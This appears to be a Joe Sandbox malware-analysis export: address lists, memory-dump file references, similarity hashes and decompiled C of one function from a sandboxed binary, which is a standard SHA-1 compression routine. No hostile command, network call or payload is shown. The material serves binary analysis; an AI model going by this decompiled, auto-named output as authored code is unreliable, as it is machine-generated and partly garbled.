0x00077910
0x00077913
0x00077913
0x00077916
0x00077921
0x00077925
0x0007792a
0x0007792d
0x0007792f
0x000779e3
0x000779e3
0x000779e6
0x000779e8
0x00000000
0x00000000
0x000779ee
0x000779f4
0x000779fa
0x000779ff
0x00077a03
0x00077a09
0x00077a12
0x00077a15
0x00077a15
0x00077a15
0x00077a1a
0x00077a1a
0x00077281
0x00077281
0x00000000
0x00077935
0x00077935
0x00077937
0x00000000
0x00000000
0x0007793d
0x00077943
0x00077945
0x0007794b
0x0007794f
0x00077952
0x00077956
0x000779a8
0x000779ab
0x000775df
0x000775df
0x000775e2
0x000775e4
0x0007712e
0x00077132
0x00077132
0x00077136
0x00077136
0x0007713c
0x0007713f
0x00077141
0x00077145
0x00000000
0x00000000
0x00000000
0x00077145
0x00077136
0x000775ed
0x000775ef
0x000775f2
0x000775f5
0x00000000
0x00000000
0x000775fe
0x00077601
0x00077604
0x00077607
0x00000000
0x00000000
0x00077610
0x00077613
0x00077616
0x00077619
0x00000000
0x00000000
0x00077622
0x00077625
0x00077628
0x0007762b
0x00000000
0x00000000
0x00077634
0x00077637
0x0007763a
0x0007763d
0x00000000
0x00000000
0x00077646
0x00077649
0x0007764d
0x00077650
0x00077653
0x0007765c
0x0007765f
0x0007765f
0x00000000
0x00077653
0x000779b3
0x000779b3
0x000779b6
0x000779ba
0x000779bc
0x000779c0
0x000779c5
0x000779c9
0x000779cc
0x000779cf
0x000779d2
0x000779d5
0x000779d9
0x000779d9
0x000779d9
0x000775db
0x000775db
0x00000000
0x000775db
0x00077958
0x0007795b
0x00000000
0x00000000
0x00077963
0x00077963
0x00077966
0x00077969
0x0007796c
0x00077971
0x00077977
0x0007797d
0x00077983
0x00077989
0x0007798f
0x00077992
0x00077995
0x00077998
0x0007799b
0x0007799e
0x0007799e
0x0007799e
0x00000000
0x000779a3
0x0007792f
0x0007787f
0x00077882
0x00077882
0x00077884
0x00000000
0x00000000
0x00077886
0x00077887
0x0007788a
0x0007788d
0x00000000
0x00000000
0x00000000
0x0007788f
0x00077891
0x00000000
0x00077891
0x00077849
0x0007784c
0x00077856
0x0007785e
0x00077864
0x00077867
0x00000000
0x00000000
0x00000000
0x00000000
0x00077816
0x00077816
0x00077819
0x0007781b
0x0007781e
0x0007781e
0x0007781e
0x00000000
0x00077816
0x000776ec
0x000776ef
0x000776f3
0x000776f5
0x0007720b
0x0007720b
0x00000000
0x0007720b
0x000776fb
0x000776fe
0x00077703
0x00077705
0x0007770f
0x00077714
0x00077716
0x000777c6
0x000777c6
0x000777c9
0x000777cb
0x00000000
0x00000000
0x000777d1
0x000777d7
0x000777dd
0x000777e2
0x000777e6
0x000777ec
0x000777f5
0x000777f8
0x000777f8
0x000777f8
0x00000000
0x000777fd
0x0007771c
0x0007771e
0x00000000
0x00000000
0x00077724
0x0007772a
0x0007772c
0x00077732
0x00077736
0x00077739
0x0007773d
0x0007778f
0x00077792
0x00000000
0x00000000
0x0007779a
0x0007779a
0x0007779d
0x0007779f
0x000777a3
0x000777a8
0x000777ac
0x000777af
0x000777b2
0x000777b5
0x000777b8
0x000777bc
0x000777bc
0x000777bc
0x00000000
0x000777c1
0x0007773f
0x00077742
0x00000000
0x00000000
0x0007774a
0x0007774a
0x0007774d
0x00077750
0x00077753
0x00077758
0x0007775e
0x00077764
0x0007776a
0x00077770
0x00077776
0x00077779
0x0007777c
0x0007777f
0x00077782
0x00077785
0x00077785
0x00077785
0x00000000
0x0007778a
0x000776b3
0x000776b7
0x000776bc
0x000776be
0x00000000
0x00000000
0x000776c7
0x000776cc
0x000776ce
0x00000000
0x00000000
0x00000000
0x000776ce
0x00077295
0x0007729b
0x0007729e
0x000772af
0x000772b2
0x000772b2
0x000772a0
0x000772a0
0x000772a0
0x000772b4
0x000772b7
0x000772b9
0x000772e3
0x000772bb
0x000772bd
0x000772c4
0x000772cc
0x000772ce
0x000772d0
0x000772d8
0x000772de
0x000772de
0x000772e8
0x000772ef
0x000772f5
0x000772fb
0x00077302
0x00077330
0x00077331
0x00077332
0x00077334
0x00077350
0x00077353
0x0007735a
0x0007735d
0x00077360
0x0007736c
0x00077378
0x0007737a
0x00077380
0x00077382
0x00077382
0x00077384
0x00000000
0x00077384
0x0007733c
0x0007733f
0x0007733f
0x00077341
0x00000000
0x00000000
0x00077343
0x00077344
0x00077347
0x0007734a
0x00000000
0x00000000
0x00000000
0x0007734c
0x0007734e
0x00000000
0x00077304
0x00077306
0x00077309
0x00077313
0x0007731b
0x00077321
0x00077324
0x0007738c
0x0007738c
0x0007738f
0x00077392
0x000773a2
0x000773a5
0x000773a5
0x00077394
0x00077394
0x00077394
0x000773a7
0x000773ab
0x000773ae
0x000773b2
0x000773b4
0x000773b8
0x000773ba
0x000774eb
0x000774eb
0x000774f1
0x000774f3
0x000774f4
0x000774fa
0x000774fc
0x000774fd
0x00077503
0x00077505
0x00077505
0x00077505
0x00077503
0x000774fa
0x00077509
0x0007750f
0x00077515
0x00077518
0x0007751b
0x00077526
0x00077528
0x0007752d
0x00077530
0x00077534
0x00077536
0x00077667
0x00077667
0x0007766b
0x0007766e
0x00077670
0x00000000
0x00000000
0x00077676
0x0007767c
0x00077680
0x00077686
0x0007768b
0x0007768f
0x00077695
0x0007769e
0x000776a1
0x000776a1
0x000776a1
0x00000000
0x0007753c
0x0007753c
0x0007753e
0x00000000
0x00000000
0x00077544
0x0007754a
0x0007754d
0x00077553
0x00077557
0x0007755a
0x0007755e
0x000775a9
0x000775ac
0x00000000
0x00000000
0x000775b0
0x000775b0
0x000775b3
0x000775b7
0x000775b9
0x000775bd
0x000775c2
0x000775c6
0x000775c9
0x000775cc
0x000775cf
0x000775d2
0x000775d6
0x000775d6
0x000775d6
0x00000000
0x000775b9
0x00077560
0x00077563
0x00000000
0x00000000
0x00077567
0x00077567
0x0007756a
0x0007756d
0x00077570
0x00077575
0x0007757b
0x00077581
0x00077587
0x0007758d
0x00077593
0x00077596
0x00077599
0x0007759c
0x0007759f
0x000775a2
0x000775a2
0x000775a2
0x00000000
0x000775a7
0x000773c0
0x000773c0
0x000773c3
0x000774be
0x000774c7
0x000774d1
0x000774d5
0x000774de
0x000774e1
0x000774e1
0x000774e4
0x000774e7
0x000774e7
0x00000000
0x000774e7
0x000773c9
0x000773ff
0x000773cb
0x000773ce
0x000773d3
0x000773db
0x000773e3
0x000773e6
0x000773ee
0x000773f5
0x000773fa
0x000773fa
0x00077404
0x0007740b
0x00077411
0x00077417
0x0007741e
0x0007744c
0x0007744d
0x0007744e
0x00077452
0x00077454
0x00077472
0x00077475
0x00077481
0x00077484
0x00077488
0x0007748d
0x000774a0
0x000774a2
0x000774a8
0x000774aa
0x000774aa
0x000774ac
0x00000000
0x000774ac
0x0007745c
0x0007745f
0x0007745f
0x00077461
0x00000000
0x00000000
0x00077463
0x00077464
0x00077467
0x0007746a
0x00000000
0x00000000
0x00000000
0x0007746c
0x0007746e
0x00000000
0x00077420
0x00077422
0x00077425
0x0007742f
0x00077437
0x0007743d
0x00077440
0x000774b4
0x000774b7
0x00000000
0x000774b7
0x0007741e
0x000773ba
0x00077302
0x0007727b
0x0007727e
0x0007727e
0x0007727e
0x00000000
0x0007727e
0x0007721f
0x00077222
0x00077222
0x00077224
0x00000000
0x00000000
0x00077226
0x00077227
0x0007722a
0x0007722d
0x00000000
0x00000000
0x00000000
0x0007722f
0x00077231
0x00000000
0x00077231
0x000771e0
0x000771e3
0x000771ed
0x000771f5
0x000771fb
0x000771fe
0x00077201
0x00000000
0x00077201
0x0007718e
0x00077191
0x00000000
0x00000000
0x00077195
0x000771a0
0x000771a6
0x00077a2f
0x00077a2f
0x00000000
0x00077a2f
0x000771ac
0x00000000
0x00000000
0x000771b4
0x000771ba
0x00000000
0x00000000
0x00000000
0x000771ba
0x00077136
0x00077102
0x000770d3
0x000770d7
0x000770db
0x000770df
0x000770e7
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction ID: c793685e2158544aceb40ccf05e2fb95f77caec38d8da6741e06956c9faa7742
Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction Fuzzy Hash: 88622470A0874A9FC729CF28C8805B9BBE1BF55304F14C66DD8AE87742D738E955CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0006ED14 Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0006ED14(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v40;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E0007F4B0(_t839, _a12, 0x40);
					_t906 =  &(( &_v40)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_v24 = _t848[2];
				_v28 = _t848[3];
				_v36 = 0;
				_t429 = E00086064( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_v32 =  &(_t839[3]);
				do {
					_t431 = E00086064(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t431;
					_t436 = E00086064( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t436;
					asm("ror esi, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _v28 + _t436;
					_t441 = E00086064( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t441;
					asm("ror dword [esp+0x28], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _v28 ^ _t593) + _v24 + 0x5a827999 + _t441;
					_t443 = E00086064( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t443;
					_t446 = _v36 + 5;
					asm("ror dword [esp+0x30], 0x2");
					_v36 = _t446;
					_t593 = _t593 + ((_t851 ^ _v28) & _v24 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00086064(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t448;
				} while (_v36 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t769 + _v28 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_v40 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _v24 + 0x5a827999;
				asm("ror esi, 0x2");
				_v32 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _v40 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _v40;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_v40 = _t887;
				_t888 = _v32;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_v36 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_v32 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_v40 ^ _v32 ^ _t891) + 0x6ed9eba1 + _v36 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _v36;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v36 = _t855;
					_t489 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v32 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _v36) + _v40 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _v40;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _v36) + _v32 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _v32;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_v32 = _t894;
					_v36 = _v36 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _v36 - 0x70e44324 + ((_v32 | _v28) & _t598 | _v32 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _v36;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v36 = _t842;
					_t811 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v28 | _t842) & _v32 | _v28 & _t842) + _t867 + _v40;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _v40 + 0x8f1bbcdc + ((_t897 | _v36) & _v28 | _t897 & _v36) + _t871 + _v32;
					_v24 = _t897;
					_t898 = _v20;
					_v32 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _v40;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _v36 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _v32;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_v32 = _t899;
					_t858 = _v4;
					_v36 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _v36;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_v40 ^ _v32 ^ _t902) + _t820 + _t845 + _v36 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _v36;
					asm("rol ecx, 0x5");
					_v40 = (_v32 ^ _v28 ^ _t882) + _t825 + _v40 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_v36 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_v32 = (_t604 ^ _v28 ^ _v36) + _t830 + _v32 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v28 = (_t845 ^ _v40 ^ _v36) + _t834 + _v28 + _v32 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _v32;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _v40;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_v32 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _v36;
					_v16 = _t816;
					_v36 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}

0x0006ed14
0x0006ed20
0x0006ed2c
0x0006ed36
0x0006ed3b
0x0006ed40
0x0006ed22
0x0006ed22
0x0006ed26
0x0006ed26
0x0006ed43
0x0006ed4c
0x0006ed4e
0x0006ed51
0x0006ed5b
0x0006ed61
0x0006ed65
0x0006ed7d
0x0006ed88
0x0006ed8a
0x0006ed8c
0x0006ed91
0x0006ed94
0x0006ed98
0x0006ed9c
0x0006ed9f
0x0006edaa
0x0006edaf
0x0006edc9
0x0006edce
0x0006edd9
0x0006ede6
0x0006edeb
0x0006edff
0x0006ee06
0x0006ee10
0x0006ee1d
0x0006ee26
0x0006ee36
0x0006ee42
0x0006ee44
0x0006ee4f
0x0006ee54
0x0006ee57
0x0006ee6b
0x0006ee72
0x0006ee79
0x0006ee82
0x0006ee86
0x0006ee8a
0x0006ee95
0x0006ee98
0x0006ee9b
0x0006eea7
0x0006eeb9
0x0006eebc
0x0006eebe
0x0006eed4
0x0006eedc
0x0006eee0
0x0006eeeb
0x0006eefd
0x0006ef04
0x0006ef07
0x0006ef0d
0x0006ef0f
0x0006ef14
0x0006ef19
0x0006ef2f
0x0006ef38
0x0006ef3a
0x0006ef3d
0x0006ef43
0x0006ef49
0x0006ef58
0x0006ef68
0x0006ef6a
0x0006ef70
0x0006ef72
0x0006ef78
0x0006ef7d
0x0006ef81
0x0006ef87
0x0006ef8b
0x0006ef95
0x0006ef9c
0x0006efa1
0x0006efa2
0x0006efa6
0x0006efaa
0x0006efae
0x0006efae
0x0006efae
0x0006efb3
0x0006efb7
0x0006efbf
0x0006efc5
0x0006efc8
0x0006efcb
0x0006efda
0x0006efe9
0x0006efeb
0x0006efee
0x0006eff4
0x0006effe
0x0006f003
0x0006f009
0x0006f00d
0x0006f011
0x0006f015
0x0006f019
0x0006f01e
0x0006f031
0x0006f040
0x0006f042
0x0006f045
0x0006f04b
0x0006f050
0x0006f063
0x0006f069
0x0006f06d
0x0006f07d
0x0006f086
0x0006f090
0x0006f093
0x0006f095
0x0006f09c
0x0006f0a2
0x0006f0b1
0x0006f0be
0x0006f0c4
0x0006f0cc
0x0006f0ed
0x0006f0f0
0x0006f0f7
0x0006f0fb
0x0006f0fe
0x0006f108
0x0006f118
0x0006f11d
0x0006f125
0x0006f13c
0x0006f143
0x0006f147
0x0006f149
0x0006f14c
0x0006f152
0x0006f15b
0x0006f16b
0x0006f170
0x0006f177
0x0006f17b
0x0006f17f
0x0006f18a
0x0006f18b
0x0006f195
0x0006f195
0x0006f195
0x0006f198
0x0006f19b
0x0006f1a2
0x0006f1a7
0x0006f1ac
0x0006f1b3
0x0006f1c1
0x0006f1d0
0x0006f1d2
0x0006f1d8
0x0006f1e7
0x0006f1ea
0x0006f1ed
0x0006f1ee
0x0006f1fa
0x0006f1fe
0x0006f208
0x0006f20a
0x0006f211
0x0006f221
0x0006f22a
0x0006f22c
0x0006f22f
0x0006f243
0x0006f24a
0x0006f24d
0x0006f257
0x0006f25d
0x0006f261
0x0006f271
0x0006f280
0x0006f283
0x0006f285
0x0006f288
0x0006f2ac
0x0006f2b5
0x0006f2b8
0x0006f2ba
0x0006f2be
0x0006f2c8
0x0006f2cf
0x0006f2e5
0x0006f2ef
0x0006f2f1
0x0006f2f5
0x0006f303
0x0006f312
0x0006f31a
0x0006f31f
0x0006f326
0x0006f33f
0x0006f345
0x0006f347
0x0006f34b
0x0006f351
0x0006f359
0x0006f35e
0x0006f36e
0x0006f374
0x0006f378
0x0006f382
0x00000000
0x00000000
0x0006f191
0x0006f191
0x0006f38a
0x0006f38b
0x0006f38f
0x0006f38f
0x0006f38f
0x0006f394
0x0006f398
0x0006f39d
0x0006f3a2
0x0006f3a7
0x0006f3a9
0x0006f3ab
0x0006f3af
0x0006f3be
0x0006f3cd
0x0006f3cf
0x0006f3d2
0x0006f3da
0x0006f3df
0x0006f3e8
0x0006f3ee
0x0006f3f2
0x0006f3f6
0x0006f3fd
0x0006f3ff
0x0006f412
0x0006f421
0x0006f423
0x0006f426
0x0006f42e
0x0006f441
0x0006f445
0x0006f449
0x0006f44c
0x0006f45c
0x0006f465
0x0006f46f
0x0006f472
0x0006f474
0x0006f47b
0x0006f47f
0x0006f494
0x0006f49d
0x0006f4a1
0x0006f4a5
0x0006f4ca
0x0006f4d3
0x0006f4d6
0x0006f4d8
0x0006f4db
0x0006f4e9
0x0006f4f6
0x0006f513
0x0006f516
0x0006f51a
0x0006f51c
0x0006f51f
0x0006f525
0x0006f52d
0x0006f536
0x0006f53a
0x0006f543
0x0006f547
0x0006f549
0x0006f550
0x0006f554
0x0006f55d
0x0006f561
0x0006f564
0x0006f567
0x0006f56a
0x0006f56c
0x0006f576

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
